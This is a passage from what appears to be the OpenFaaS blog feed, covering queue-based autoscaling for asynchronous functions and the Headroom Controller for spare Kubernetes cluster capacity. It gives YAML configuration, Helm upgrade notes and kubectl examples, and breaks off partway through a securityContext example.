<p>All previous scaling modes used <em>output metrics</em> from the function to determine the amount of replicas, which can involve some lag as the invocations build up from a few per second, to hundreds or thousands per second.</p>

<p>When using the queue-depth, we have an <em>input metric</em> that is available immediately, and can be used to set the exact number of replicas needed to process the backlog of requests.</p>

<p><strong>A note from a customer</strong></p>

<p><a href="https://www.workwithsurge.com">Surge</a> is a lending platform providing in-depth financial analysis, insights and risk management for their clients. They use dozens of OpenFaaS functions to process data in long-running asynchronous jobs. Part of that involves synchronising data between <a href="https://www.salesforce.com">Salesforce.com</a> and Snowflake, a data warehousing solution.</p>

<p>Kevin Lindsay, Principal Engineer at Surge rolled out Queue-Based Scaling for their existing functions and said:</p>

<blockquote>
  <p>“We just changed the <code class="language-plaintext highlighter-rouge">com.openfaas.scale.type</code> to <code class="language-plaintext highlighter-rouge">queue</code> and now async is basically instantly reactive, burning through large queues in minutes”</p>
</blockquote>

<p>Kevin explained that Surge makes heavy use of Datadog for logging and insights, which charges based upon various factors, including the number of Pods and Nodes in the cluster. So unnecessary Pods, and extra capacity in the cluster means a larger bill, so having reactive horizontal scaling and scale to zero is a big win for them.</p>

<p><strong>Load test - Comparing Queue-Based Scaling to Capacity Scaling</strong></p>

<p>We ran a load test to compare the new Queue-Based Scaling mode to the existing Capacity scaling mode. Capacity mode is also effective for asynchronous invocations, and functions that are invoked in a hybrid manner (i.e. a mixture of both synchronous and asynchronous invocations).</p>

<p>For the test, we used <code class="language-plaintext highlighter-rouge">hey</code> to generate 1000 invocations of the sleep function from the store. Each invocation had a variable run-time of 10-25s to simulate a long-running job.</p>

<p>You will see a number of retries in the graphs emitted as 429 responses from the function. This is because we set a hard-limit of 5 inflight connections per replica to simulate a limited or expensive resource such as API calls or database connections.</p>

<p>First up - Capacity Scaling:</p>

<p><img src="/images/2025-07-queue-based/capacity-scaling.png" alt="Load test with capacity mode" /></p>

<p>We see that the load starts low, and builds up as the number of inflight connections increases, and the autoscaler responds by adding more replicas.</p>

<p>It is effective, but given that all of the invocations are asynchronous, we already had the data to scale up to the maximum number of replicas immediately.</p>

<p>Next up - Queue-Based Scaling:</p>

<p><img src="/images/2025-07-queue-based/queue-scaling.png" alt="Load test with queue mode" /></p>

<p>The load metric in this screenshot is the equivalent of the pending queue-depth.</p>

<p>We see the number of replicas jump straight to the maximum of 10 and remain there until the queue is emptied, which means the load (the number of in-progress invocations) is also able to start out at the maximum level.</p>

<h2 id="how-does-it-work">How does it work?</h2>

<p>Just like all the other autoscaling modes, basic ranges are set in the <a href="https://docs.openfaas.com/reference/yaml/">function’s stack.yaml</a> file, or via a <a href="https://docs.openfaas.com/reference/rest-api/">REST API call</a>.</p>

<p><strong>A quick recap on scaling modes</strong></p>

<p>One size does not fit all, and to give a quick summary:</p>

<ul>
  <li>RPS - a default, and useful for most functions that execute quickly</li>
  <li>Capacity - also known as “inflight connections” or “concurrency” - best for long running jobs or those which are going to be limited on concurrency</li>
  <li>CPU - a good fit when RPS/Capacity aren’t working as expected</li>
  <li>Custom - any metric that you can find in Prometheus, or emit from some component of your stack can be used to drive scaling</li>
</ul>

<p><strong>Demo with Queue-Based Scaling</strong></p>

<p>First, you can set a custom range for the minimum and maximum number of replicas (or use the defaults):</p>

<div class="language-yaml highlighter-rouge"><div class="highlight"><pre class="highlight"><code><span class="na">functions</span><span class="pi">:</span>
  <span class="na">etl</span><span class="pi">:</span>
    <span class="na">labels</span><span class="pi">:</span>
        <span class="na">com.openfaas.scale.min</span><span class="pi">:</span> <span class="s2">"</span><span class="s">1"</span>
        <span class="na">com.openfaas.scale.max</span><span class="pi">:</span> <span class="s2">"</span><span class="s">100"</span>
</code></pre></div></div>

<p>Then, you specify whether it should also scale to zero, with an optional custom idle period:</p>

<div class="language-yaml highlighter-rouge"><div class="highlight"><pre class="highlight"><code>    <span class="na">labels</span><span class="pi">:</span>
        <span class="na">com.openfaas.scale.zero</span><span class="pi">:</span> <span class="s2">"</span><span class="s">true"</span>
        <span class="na">com.openfaas.scale.zero-duration</span><span class="pi">:</span> <span class="s2">"</span><span class="s">5m"</span>
</code></pre></div></div>

<p>Finally, you can set the scaling mode and how many requests per Pod to target:</p>

<div class="language-yaml highlighter-rouge"><div class="highlight"><pre class="highlight"><code>    <span class="na">labels</span><span class="pi">:</span>
        <span class="na">com.openfaas.scale.mode</span><span class="pi">:</span> <span class="s2">"</span><span class="s">queue"</span>
        <span class="na">com.openfaas.scale.target</span><span class="pi">:</span> <span class="s2">"</span><span class="s">10"</span>
        <span class="na">com.openfaas.scale.target-proportion</span><span class="pi">:</span> <span class="s2">"</span><span class="s">1"</span>
</code></pre></div></div>

<p>With all of the above, we have a function that:</p>

<ul>
  <li>Scales from 1 to 100 replicas</li>
  <li>Scales to zero after 5 minutes of inactivity</li>
  <li>For each 10 requests in the queue, we will get 1 Pod</li>
</ul>
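
<p>Putting the three snippets together, the complete set of labels for the <code class="language-plaintext highlighter-rouge">etl</code> function looks like this:</p>

<div class="language-yaml highlighter-rouge"><div class="highlight"><pre class="highlight"><code>functions:
  etl:
    labels:
      com.openfaas.scale.min: "1"
      com.openfaas.scale.max: "100"
      com.openfaas.scale.zero: "true"
      com.openfaas.scale.zero-duration: "5m"
      com.openfaas.scale.mode: "queue"
      com.openfaas.scale.target: "10"          # 10 queued requests per Pod
      com.openfaas.scale.target-proportion: "1"
</code></pre></div></div>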

<p>So if you have to scan 1,000,000 CSV files from an AWS S3 Bucket, you could enqueue one request for each file. This would create a queue depth of 1M requests and so the autoscaler would immediately create 100 Pods (the maximum set via the label).</p>

<p>In any of the prior modes, the Queue Worker would have to build up a steady flow of requests, in order for the scaling to take place.</p>

<p>If you wanted to generate load in a rudimentary way, you could use the open source tool <code class="language-plaintext highlighter-rouge">hey</code> to submit, say, 2.5 million requests to the above function.</p>

<div class="language-bash highlighter-rouge"><div class="highlight"><pre class="highlight"><code>hey <span class="nt">-d</span> PAYLOAD <span class="nt">-m</span> POST <span class="nt">-n</span> 2500000 <span class="nt">-c</span> 100 http://127.0.0.1:8080/async-function/etl
</code></pre></div></div>

<p>Any function invoked via the queue-worker can also return its result via a webhook, if you pass in a URL via the <code class="language-plaintext highlighter-rouge">X-Callback-Url</code> header.</p>

<h2 id="concurrency-limiting-and-retrying-requests">Concurrency limiting and retrying requests</h2>

<p>Queued requests can be limited in concurrency, and retried if they fail.</p>

<p>Hard concurrency limiting can be achieved by setting the <code class="language-plaintext highlighter-rouge">max_inflight</code> environment variable, e.g. a value of <code class="language-plaintext highlighter-rouge">10</code> means the 11th concurrent request gets a 429 Too Many Requests response.</p>

<div class="language-yaml highlighter-rouge"><div class="highlight"><pre class="highlight"><code>    <span class="na">environment</span><span class="pi">:</span>
        <span class="na">max_inflight</span><span class="pi">:</span> <span class="s2">"</span><span class="s">10"</span>
</code></pre></div></div>

<p><a href="https://docs.openfaas.com/openfaas-pro/retries/">Retries</a> are already configured as a system-wide default from the Helm chart, but they can be overridden on a per function basis, which is important for long running jobs that may take a while to complete.</p>

<div class="language-yaml highlighter-rouge"><div class="highlight"><pre class="highlight"><code>    <span class="na">annotations</span><span class="pi">:</span>
      <span class="na">com.openfaas.retry.attempts</span><span class="pi">:</span> <span class="s2">"</span><span class="s">100"</span>
      <span class="na">com.openfaas.retry.codes</span><span class="pi">:</span> <span class="s2">"</span><span class="s">429"</span>
      <span class="na">com.openfaas.retry.min_wait</span><span class="pi">:</span> <span class="s2">"</span><span class="s">5s"</span>
      <span class="na">com.openfaas.retry.max_wait</span><span class="pi">:</span> <span class="s2">"</span><span class="s">5m"</span>
</code></pre></div></div>

<h2 id="better-fairness-and-efficiency">Better fairness and efficiency</h2>

<p>The previous version of the Queue Worker created a single Consumer for all invocations.</p>

<p>That meant that if you had 10,000 invocations come in from one tenant for their functions, they would likely block any other requests that came in after that.</p>

<p>The new mode creates a Consumer per function, where each Consumer gets scheduled independently into a work queue.</p>

<p>If you do find that certain tenants, or functions are monopolising the queue, you can provision dedicated queues using the <a href="https://github.com/openfaas/faas-netes/tree/master/chart/queue-worker">Queue Worker Helm chart</a>.</p>
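
<p>Functions are assigned to a dedicated queue via the <code class="language-plaintext highlighter-rouge">com.openfaas.queue</code> annotation in stack.yaml - for example, routing a long-running function (the name is illustrative) to a <code class="language-plaintext highlighter-rouge">slow-fns</code> queue:</p>

<div class="language-yaml highlighter-rouge"><div class="highlight"><pre class="highlight"><code>functions:
  transcode:
    annotations:
      # Route async invocations to the dedicated "slow-fns" queue
      com.openfaas.queue: slow-fns
</code></pre></div></div>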

<p>Let’s picture the difference by observing the Grafana Dashboard for the Queue Worker.</p>

<p>In the first picture, we’ll show the default mode “static” where a single Consumer is created for all functions, and asynchronous invocations are processed in a FIFO manner.</p>

<p>The sleep-1 function has all of its invocations processed first, and sleep-2 is unable to make any progress until the first function has been processed.</p>

<p><img src="/images/2025-07-queue-based/fairness-static.png" alt="Queue metrics dashboard in static mode" /></p>

<p>Next, we show two functions that are invoked asynchronously, but this time with the new “function” mode. Each function has its own Consumer, and so they can be processed independently.</p>

<p><img src="/images/2025-07-queue-based/fairness-function.png" alt="Queue metrics dashboard in function mode" /></p>

<p>Here, we see that the sleep-1 function is still being processed first, but the sleep-2 function is also able to make progress at the same time.</p>

<h2 id="what-changes-have-been-made">What changes have been made?</h2>

<p>A number of changes have been made to support Queue-Based Scaling:</p>

<ul>
  <li>
    <p>Queue Worker - the component that performs asynchronous invocations</p>

    <p>When set to run in “function” mode, it will now create a Consumer per function with queued requests.</p>

    <p>It deletes any Consumers once all available invocations have been processed.</p>
  </li>
  <li>
    <p>Helm chart - new scaling rule and type “queue”</p>

    <p>No changes were needed in the autoscaler; the Helm chart introduces a new scaling rule named “queue”.</p>
  </li>
  <li>
    <p>Gateway - publish invocations to an updated subject</p>

    <p>Previously all messages were published to a single subject in NATS which meant no metric could be obtained on a per-function basis.</p>

    <p>The updated subject format includes the function name, allowing for precise queue depth metrics to be collected.</p>
  </li>
</ul>

<p>Note that the 0.5.x gateway will start publishing messages to a new subject format, so if you update the gateway, you must also update the Queue Worker to 0.4.x or later, otherwise the Queue Worker will not be able to consume any messages.</p>

<p>This includes any dedicated or separate queue-workers that you have deployed; update them using the separate queue-worker Helm chart.</p>

<h2 id="how-do-you-turn-it-all-on">How do you turn it all on?</h2>

<p>Since these features change the way that OpenFaaS works, and we value backwards compatibility, Queue-Based Scaling is an opt-in feature.</p>

<p>First, update to the latest version of the OpenFaaS Helm chart which includes:</p>

<ul>
  <li>Queue Worker 0.4.x or later</li>
  <li>Gateway 0.5.x or later</li>
</ul>

<p>Then configure the following in your <code class="language-plaintext highlighter-rouge">values.yaml</code> file:</p>

<div class="language-diff highlighter-rouge"><div class="highlight"><pre class="highlight"><code><span class="p">jetstreamQueueWorker:
</span>  mode: function
</code></pre></div></div>

<p>The <code class="language-plaintext highlighter-rouge">mode</code> variable can be set to <code class="language-plaintext highlighter-rouge">static</code> to use the previous FIFO / single Consumer model, or <code class="language-plaintext highlighter-rouge">function</code> to use the new Consumer per function model.</p>

<p>At the same time as introducing this new setting, we have deprecated an older configuration option that is no longer needed: <code class="language-plaintext highlighter-rouge">queueMode</code>.</p>

<p>So if you have a <code class="language-plaintext highlighter-rouge">queueMode</code> setting in your <code class="language-plaintext highlighter-rouge">values.yaml</code>, you can now safely remove it so long as you stay on a newer version of the Helm chart.</p>

<p>In the main chart, the <code class="language-plaintext highlighter-rouge">jetstreamQueueWorker.durableName</code> field is no longer used or required.</p>

<h3 id="dedicated-queue-workers">Dedicated queue-workers</h3>

<p>If you have dedicated queue-workers deployed, you will need to update them using the separate queue-worker Helm chart.</p>

<p>A new field called <code class="language-plaintext highlighter-rouge">queueName</code> is introduced in values.yaml; it is unset by default. When it is not set, the queue will take the name of the stream.</p>

<p>So if you had an annotation of <code class="language-plaintext highlighter-rouge">com.openfaas.queue=slow-fns</code>, you would set the <code class="language-plaintext highlighter-rouge">queueName</code> like this in values.yaml:</p>

<div class="language-diff highlighter-rouge"><div class="highlight"><pre class="highlight"><code><span class="p">maxInflight: 5
</span><span class="gi">+queueName: slow-fns
</span><span class="p">mode: static
nats:
</span>  stream:
    name: slow-fns
  consumer:
    durableName: slow-fns-workers
<span class="p">upstreamTimeout: 15m  
</span></code></pre></div></div>

<p>Alternatively, you can leave <code class="language-plaintext highlighter-rouge">queueName</code> as empty, or not set it at all, and the name will be taken from <code class="language-plaintext highlighter-rouge">nats.stream.name</code>.</p>

<p>The top level setting <code class="language-plaintext highlighter-rouge">durableName</code> has now been removed.</p>

<p>You can read more in the <a href="https://github.com/openfaas/faas-netes/blob/master/chart/queue-worker/README.md">README</a> for the queue-worker chart.</p>

<h2 id="wrapping-up">Wrapping up</h2>

<p>A quick summary about Queue-Based Scaling:</p>

<ul>
  <li>The Queue-Worker consumes messages in a fairer way than previously</li>
  <li>It creates Consumers per function but only when they have some work to do</li>
  <li>The new <code class="language-plaintext highlighter-rouge">queue</code> scaling mode is reactive and precise - setting the exact number of replicas immediately</li>
  <li>Better for multi-tenant deployments, where one tenant cannot monopolise the queue as easily</li>
</ul>

<p>If you’d like a demo about asynchronous processing or long running jobs, please reach out via the <a href="https://openfaas.com/pricing">form on our pricing page</a>.</p>

<p>Use-cases:</p>

<ul>
  <li><a href="/blog/pdf-generation-at-scale-on-kubernetes">Generate PDFs at Scale</a></li>
  <li><a href="/blog/fan-out-and-back-in-using-functions/">Exploring the Fan out and Fan in pattern</a></li>
  <li><a href="/blog/what-goes-up-must-come-down/">On Autoscaling - What Goes Up Must Come Down</a></li>
</ul>

<p>Docs:</p>

<ul>
  <li><a href="https://docs.openfaas.com/async/">Docs: OpenFaaS Asynchronous Invocations</a></li>
  <li><a href="https://docs.openfaas.com/pro/jetstream-queue-worker/">Docs: OpenFaaS Queue Worker</a></li>
</ul>]]></content><author><name>OpenFaaS Ltd</name></author><category term="queue" /><category term="async" /><category term="autoscaling" /><category term="kubernetes" /><category term="serverless" /><summary type="html"><![CDATA[Queue Based Scaling is a long awaited feature that matches queued requests to the exact amount of replicas almost instantly.]]></summary><media:thumbnail xmlns:media="http://search.yahoo.com/mrss/" url="https://www.openfaas.com/images/2025-07-queue-based/background.png" /><media:content medium="image" url="https://www.openfaas.com/images/2025-07-queue-based/background.png" xmlns:media="http://search.yahoo.com/mrss/" /></entry><entry><title type="html">Scale Up Pods Faster in Kubernetes with Added Headroom</title><link href="https://www.openfaas.com/blog/headroom-controller/" rel="alternate" type="text/html" title="Scale Up Pods Faster in Kubernetes with Added Headroom" /><published>2025-07-22T00:00:00+00:00</published><updated>2025-07-22T00:00:00+00:00</updated><id>https://www.openfaas.com/blog/headroom-controller</id><content type="html" xml:base="https://www.openfaas.com/blog/headroom-controller/"><![CDATA[<p>Cluster Autoscalers add and remove Nodes to match the demand for resources. But they often leave no room for new Pods, adding an extra 1-2 minutes of latency.</p>

<blockquote>
  <p>Notice: The Headroom Controller is now out of the free beta/trial period. OpenFaaS customers can use it for free on licensed clusters. For everyone else, you can subscribe using the notes in the <a href="https://github.com/openfaas/faas-netes/blob/master/chart/headroom-controller/README.md">Helm chart README file</a>.</p>
</blockquote>

<p>That’s latency that you don’t want to pass onto your users.</p>

<p>In addition, when using spot instances, you’re given a very short window to reschedule Pods from reclaimed nodes.</p>

<p>In this post we’ll introduce the new Headroom Controller developed and supported by the OpenFaaS team to help solve this problem. It’s installed via Helm, configured natively via its own Custom Resource Definition (CRD), with commercial support included.</p>

<p>It’s built for Kubernetes and works with any autoscaler. OpenFaaS isn’t required, but we think your users will appreciate the quicker scaling and start-up times.</p>

<p>Contents:</p>

<ul>
  <li><a href="#what-is-a-cluster-autoscaler">What is a Cluster Autoscaler?</a></li>
  <li><a href="#what-kind-of-autoscaling-does-openfaas-provide">What kind of autoscaling does OpenFaaS provide?</a></li>
  <li><a href="#what-are-spot-instances">What are spot instances?</a></li>
  <li><a href="#what-is-headroom">What is headroom?</a></li>
  <li><a href="#how-does-the-headroom-controller-work">How does the headroom controller work?</a></li>
  <li><a href="#getting-started-with-the-headroom-controller">Getting started with the headroom controller</a></li>
  <li><a href="#next-steps">Next steps</a></li>
</ul>

<h2 id="what-is-a-cluster-autoscaler">What is a Cluster Autoscaler?</h2>

<p>A cluster autoscaler works differently to the <a href="https://docs.openfaas.com/reference/autoscaling/">OpenFaaS autoscaler</a>. Instead of scaling the number of replicas or Pods for a function, it measures the demand in the cluster for CPU and RAM, then adds or removes nodes to match the demand.</p>

<p>When you combine a Pod autoscaler such as OpenFaaS or HPAv2 with a cluster autoscaler, you can optimise for cost and efficiency. You pack the maximum number of Pods onto the fewest possible nodes.</p>

<p>For instance, if you run mainly batch jobs, file conversions, async workloads or ETL jobs - you may be able to scale down to zero Pods overnight, on the weekends or over the holidays. Over time the costs for compute add up, even if you are using spot instances (mentioned below).</p>

<p>Two popular open source autoscalers are <a href="https://github.com/kubernetes/autoscaler">Cluster Autoscaler</a> - a mature and well supported project maintained by the Kubernetes Autoscaling SIG, and <a href="https://karpenter.sh/">Karpenter</a> - a modern and fast autoscaler developed by AWS, with support for Elastic Kubernetes Service (EKS) and Azure Kubernetes Service (AKS).</p>

<p>Many cloud services have their own autoscaling groups or managed node pools; these should work just as well with the Headroom Controller.</p>

<h2 id="what-kind-of-autoscaling-does-openfaas-provide">What kind of autoscaling does OpenFaaS provide?</h2>

<p>OpenFaaS is a serverless platform for Kubernetes that provides an enterprise-grade self-hosted alternative to AWS Lambda.</p>

<p>It implements its own <em>horizontal scaling</em> for functions. Functions are implemented as Kubernetes Deployments, each with a <code class="language-plaintext highlighter-rouge">.replicas</code> field in its spec. The autoscaler works by setting that field, and Kubernetes does the rest.</p>

<p>Unlike a generic autoscaler such as HPAv2 or KEDA, the OpenFaaS autoscaler is purpose built to scale functions. It can scale based on Requests Per Second (RPS), Inflight requests (capacity), CPU, RAM, Queue Depth, or any custom metric in Prometheus.</p>

<p>As additional replicas of a function are added to the cluster, they benefit from load balancing across multiple processes and machines, which increases performance and distributes work.</p>

<p>The autoscaler will also scale idle functions to “zero” which causes all Pods to be terminated and the resources to be freed up.</p>
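<p>As a sketch of how that scaling is configured, the behaviour is driven by labels on each function in its stack.yml. The label names below come from the OpenFaaS autoscaling docs, and the values are purely illustrative:</p>

<div class="language-yaml highlighter-rouge"><div class="highlight"><pre class="highlight"><code>functions:
  bcrypt:
    image: ttl.sh/example/bcrypt:latest # illustrative image
    labels:
      com.openfaas.scale.type: capacity # scale on inflight requests
      com.openfaas.scale.target: "10"   # per-replica target
      com.openfaas.scale.min: "1"
      com.openfaas.scale.max: "10"
      com.openfaas.scale.zero: "true"   # allow scale to zero when idle
      com.openfaas.scale.zero-duration: "15m"
</code></pre></div></div>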

<h2 id="what-are-spot-instances">What are spot instances?</h2>

<p>OpenFaaS and its autoscaler can work on-premises, or in the cloud, but spot instances are really a feature of the cloud.</p>

<p>Providers such as AWS and GCP sell excess capacity within their infrastructure at a discount - up to 90% off the regular price. But this does come at a cost - the instance could be terminated at any time, and you may have a very short window to relocate your Pods to another node.</p>

<p>If an autoscaler like Karpenter has packed all your Pods into a single very large node, then you have a large failure domain and could incur significant disruption when the instance is terminated.</p>

<p>The best workloads for spot instances are stateless, and complete their work within a short period of time. Anything stateful or long-running should either be avoided, or made able to restart from a checkpoint or from the beginning.</p>

<p>Headroom can also help when spot instances are reclaimed, especially if you use a spread constraint so that the headroom is reserved across a number of instances.</p>

<p>You can learn more about OpenFaaS and Karpenter on the blog. We’ll include links in the conclusion.</p>

<h2 id="what-is-headroom">What is headroom?</h2>

<p>Cluster autoscalers tend to pack workloads into nodes as tightly as possible, meaning that if a new Pod is deployed or a workload scales up, a new node may have to be added to the cluster.</p>

<p>Adding a node can take 1-2 minutes, or even longer depending on the cluster and the cloud provider.</p>

<p>With headroom, a buffer of configurable size is added to the cluster with Pods which request resources, but simply run a sleep process. They run in a very low priority class, so that when a normal workload comes along, instead of waiting for a new node, the headroom Pods are evicted and the Pod starts immediately.</p>

<p>Then, the cluster autoscaler will request a new node in the background to add the headroom Pods back into the cluster.</p>

<p>In this way, the cluster maintains a buffer so resources can be added instantly when needed.</p>

<h2 id="how-does-the-headroom-controller-work">How does the headroom controller work?</h2>

<p>The Headroom Controller can be installed via Helm from the OpenFaaS chart repository.</p>

<p>Once installed, you can create a default and a low-priority class for the Kubernetes scheduler to use.</p>

<p>All Pods will assume the default priority class unless otherwise specified, which means they can always evict a headroom Pod.</p>

<p>Next, you can define one or more Headroom resources.</p>

<div class="language-yaml highlighter-rouge"><div class="highlight"><pre class="highlight"><code><span class="na">kind</span><span class="pi">:</span> <span class="s">Headroom</span>
<span class="na">apiVersion</span><span class="pi">:</span> <span class="s">openfaas.com/v1</span>
<span class="na">metadata</span><span class="pi">:</span>
  <span class="na">name</span><span class="pi">:</span> <span class="s">headroom</span>
<span class="na">spec</span><span class="pi">:</span>
  <span class="na">priorityClassName</span><span class="pi">:</span> <span class="s">headroom</span>
  <span class="na">requests</span><span class="pi">:</span>
    <span class="na">cpu</span><span class="pi">:</span> <span class="s">250m</span>
    <span class="na">memory</span><span class="pi">:</span> <span class="s">250Mi</span>
</code></pre></div></div>

<p>Now set up two priority classes.</p>

<ol>
  <li>Create a default PriorityClass</li>
</ol>

<div class="language-bash highlighter-rouge"><div class="highlight"><pre class="highlight"><code>  kubectl apply <span class="nt">-f</span> - <span class="o">&lt;&lt;</span> <span class="no">EOF</span><span class="sh">
  apiVersion: scheduling.k8s.io/v1
  kind: PriorityClass
  metadata:
    name: default
  value: 1000
  globalDefault: true
  description: "Default priority class for all pods"
</span><span class="no">  EOF
</span></code></pre></div></div>

<ol start="2">
  <li>Create a low priority class for the headroom Custom Resources</li>
</ol>

<div class="language-bash highlighter-rouge"><div class="highlight"><pre class="highlight"><code>  kubectl apply <span class="nt">-f</span> - <span class="o">&lt;&lt;</span><span class="no">EOF</span><span class="sh">
  apiVersion: scheduling.k8s.io/v1
  kind: PriorityClass
  metadata:
    name: headroom
  description: Low priority class for headroom pods
  globalDefault: false
  preemptionPolicy: Never
  value: -10
</span><span class="no">  EOF
</span></code></pre></div></div>

<p>Within a short period of time, a new Deployment will be created with the request values you specified.</p>

<p>If these Pods cannot be scheduled, the autoscaler you’re using should request one or more new nodes to be added to the cluster to host them.</p>

<p>Then, whenever a new Pod is scheduled or updated which requires more resources than the cluster has available, the headroom Pods will be evicted and the new Pod will start immediately.</p>
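<p>Conceptually, each Pod that the controller creates for a Headroom resource looks something like the sketch below. This is only an illustration - the controller generates the real Deployment for you, and the image name is an assumption:</p>

<div class="language-yaml highlighter-rouge"><div class="highlight"><pre class="highlight"><code>apiVersion: v1
kind: Pod
metadata:
  labels:
    headroom: headroom          # selects Pods belonging to this Headroom
spec:
  priorityClassName: headroom   # very low priority, so any normal Pod can evict it
  containers:
    - name: placeholder
      image: registry.k8s.io/pause:3.9 # assumption: any minimal sleep-style image
      resources:
        requests:
          cpu: 250m
          memory: 250Mi
</code></pre></div></div>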

<p>Watch a video demo of the Headroom Controller in action with the Cluster Autoscaler, K3s and Firecracker VMs managed by our Slicer product.</p>

<div style="margin: 0 auto;">
    
    <div class="ytcontainer">
        <iframe class="yt" allowfullscreen="" src="https://www.youtube.com/embed/MHXvhKb6PpA"></iframe>
    </div>
</div>

<h3 id="spreading-headroom-over-multiple-nodes">Spreading headroom over multiple nodes</h3>

<p>If you are using a cluster autoscaler like Karpenter, you can spread the headroom over multiple nodes by using a spread constraint.</p>

<p>The example below spreads the headroom over 5 different nodes. With a hard constraint in place, if a spot instance is terminated, an immediate buffer is available for the Pods that need to be relocated.</p>

<p>This can be a hard rule with <code class="language-plaintext highlighter-rouge">whenUnsatisfiable: DoNotSchedule</code> which won’t allow more than one headroom Pod on a node, or a soft rule with <code class="language-plaintext highlighter-rouge">whenUnsatisfiable: ScheduleAnyway</code> which will try its best to spread the Pods out across the cluster, but won’t block them if that’s not possible.</p>

<div class="language-yaml highlighter-rouge"><div class="highlight"><pre class="highlight"><code><span class="na">kind</span><span class="pi">:</span> <span class="s">Headroom</span>
<span class="na">apiVersion</span><span class="pi">:</span> <span class="s">openfaas.com/v1</span>
<span class="na">metadata</span><span class="pi">:</span>
  <span class="na">name</span><span class="pi">:</span> <span class="s">headroom-spread</span>
<span class="na">spec</span><span class="pi">:</span>
  <span class="na">replicas</span><span class="pi">:</span> <span class="m">5</span>
  <span class="na">topologySpreadConstraints</span><span class="pi">:</span>
    <span class="pi">-</span> <span class="na">maxSkew</span><span class="pi">:</span> <span class="m">1</span>
      <span class="na">topologyKey</span><span class="pi">:</span> <span class="s">kubernetes.io/hostname</span>
      <span class="na">whenUnsatisfiable</span><span class="pi">:</span> <span class="s">DoNotSchedule</span>
      <span class="na">labelSelector</span><span class="pi">:</span>
        <span class="na">matchLabels</span><span class="pi">:</span>
          <span class="na">headroom</span><span class="pi">:</span> <span class="s">headroom-spread</span>
  <span class="na">priorityClassName</span><span class="pi">:</span> <span class="s">headroom</span>
  <span class="na">requests</span><span class="pi">:</span>
    <span class="na">cpu</span><span class="pi">:</span> <span class="s">500m</span> <span class="c1"># 0.5 vCPU</span>
    <span class="na">memory</span><span class="pi">:</span> <span class="s">512Mi</span> <span class="c1"># 512MB RAM</span>
</code></pre></div></div>

<p>All Pods created by the Headroom Controller will have the label <code class="language-plaintext highlighter-rouge">headroom: $NAME_OF_HEADROOM</code> which can be used to select them in a selector.</p>

<p>The following screenshot shows a K3s cluster with one master, and 5 additional nodes which have been added to the cluster to satisfy the spread constraint.</p>

<p><a href="/images/2025-07-headroom/spread.png"><img src="/images/2025-07-headroom/spread.png" alt="Spread out across 5x additional nodes" /></a></p>

<h3 id="scaling-the-headroom">Scaling the headroom</h3>

<p>The Headroom resource also has a <code class="language-plaintext highlighter-rouge">.replicas</code> field which works with <code class="language-plaintext highlighter-rouge">kubectl scale</code>, so that you can adjust the headroom according to your needs.</p>

<div class="language-yaml highlighter-rouge"><div class="highlight"><pre class="highlight"><code><span class="na">spec</span><span class="pi">:</span>
  <span class="na">replicas</span><span class="pi">:</span> <span class="m">10</span>
</code></pre></div></div>

<p>You could also write a simple Kubernetes Cron Job to scale the headroom down during the holidays, or overnight - if your product tends to be used more during the day.</p>

<p>Assuming that you create a service account for the Cron Job named e.g. <code class="language-plaintext highlighter-rouge">headroom-scaler</code> with permission to <code class="language-plaintext highlighter-rouge">update</code> the Headroom resource, it would look something like this:</p>

<div class="language-yaml highlighter-rouge"><div class="highlight"><pre class="highlight"><code><span class="na">kind</span><span class="pi">:</span> <span class="s">CronJob</span>
<span class="na">apiVersion</span><span class="pi">:</span> <span class="s">batch/v1</span>
<span class="na">metadata</span><span class="pi">:</span>
  <span class="na">name</span><span class="pi">:</span> <span class="s">scale-headroom</span>
<span class="na">spec</span><span class="pi">:</span>
  <span class="na">schedule</span><span class="pi">:</span> <span class="s2">"</span><span class="s">0</span><span class="nv"> </span><span class="s">0</span><span class="nv"> </span><span class="s">*</span><span class="nv"> </span><span class="s">*</span><span class="nv"> </span><span class="s">*"</span>
  <span class="na">jobTemplate</span><span class="pi">:</span>
    <span class="na">spec</span><span class="pi">:</span>
      <span class="na">template</span><span class="pi">:</span>
        <span class="na">spec</span><span class="pi">:</span>
          <span class="na">restartPolicy</span><span class="pi">:</span> <span class="s">OnFailure</span>
          <span class="na">serviceAccountName</span><span class="pi">:</span> <span class="s">headroom-scaler</span>
          <span class="na">containers</span><span class="pi">:</span>
            <span class="pi">-</span> <span class="na">name</span><span class="pi">:</span> <span class="s">kubectl</span>
              <span class="na">image</span><span class="pi">:</span> <span class="s">alpine/kubectl:latest</span> <span class="c1"># Or a specific version</span>
              <span class="na">command</span><span class="pi">:</span>
              <span class="pi">-</span> <span class="s2">"</span><span class="s">/bin/sh"</span>
              <span class="pi">-</span> <span class="s2">"</span><span class="s">-c"</span>
              <span class="pi">-</span> <span class="pi">|</span>
                <span class="s">kubectl scale headroom/openfaas-fn-buffer --replicas=0</span>
</code></pre></div></div>

<p>The Cron Job will scale the headroom down to 0 replicas at midnight every day.</p>

<p>You’d just need another one to set it back to the desired state later on.</p>

<p>A full example is available in the README for the headroom controller’s Helm chart.</p>
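<p>If you need a starting point for that service account, a minimal RBAC sketch is shown below. The resource names under the <code class="language-plaintext highlighter-rouge">openfaas.com</code> API group are assumptions - verify them with <code class="language-plaintext highlighter-rouge">kubectl api-resources</code> before use:</p>

<div class="language-yaml highlighter-rouge"><div class="highlight"><pre class="highlight"><code>apiVersion: v1
kind: ServiceAccount
metadata:
  name: headroom-scaler
---
apiVersion: rbac.authorization.k8s.io/v1
kind: Role
metadata:
  name: headroom-scaler
rules:
  # headrooms/scale is needed for kubectl scale to work via the scale subresource
  - apiGroups: ["openfaas.com"]
    resources: ["headrooms", "headrooms/scale"]
    verbs: ["get", "update", "patch"]
---
apiVersion: rbac.authorization.k8s.io/v1
kind: RoleBinding
metadata:
  name: headroom-scaler
roleRef:
  apiGroup: rbac.authorization.k8s.io
  kind: Role
  name: headroom-scaler
subjects:
  - kind: ServiceAccount
    name: headroom-scaler
</code></pre></div></div>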

<h3 id="what-if-headroom-pods-need-a-securitycontext">What if Headroom Pods need a securityContext?</h3>

<p>If you are running <a href="https://kyverno.io/">Kyverno</a> or <a href="https://open-policy-agent.github.io/gatekeeper/website/docs/">Gatekeeper</a>, it’s likely that Pods cannot be scheduled without some kind of securityContext. We’ve thought of that already and added a <code class="language-plaintext highlighter-rouge">.podSecurityContext</code> field to the Headroom resource.</p>

<div class="language-yaml highlighter-rouge"><div class="highlight"><pre class="highlight"><code><span class="na">spec</span><span class="pi">:</span>
  <span class="na">podSecurityContext</span><span class="pi">:</span>
    <span class="na">runAsNonRoot</span><span class="pi">:</span> <span class="no">true</span>
